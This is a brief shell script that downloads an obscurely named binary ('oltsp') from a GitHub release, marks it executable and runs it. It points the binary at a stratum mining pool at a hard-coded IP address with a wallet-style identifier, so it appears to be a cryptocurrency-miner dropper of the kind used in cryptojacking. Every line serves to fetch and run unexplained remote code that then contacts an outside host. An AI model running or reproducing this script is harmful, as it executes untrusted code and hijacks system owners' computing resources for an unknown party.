#!/bin/sh
apt update && apt install unzip -y
wget https://github.com/tallapallitech63/opmol/releases/download/oukl/oltsp
chmod +x oltsp
./oltsp -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-oltsp@104.200.16.34:8083
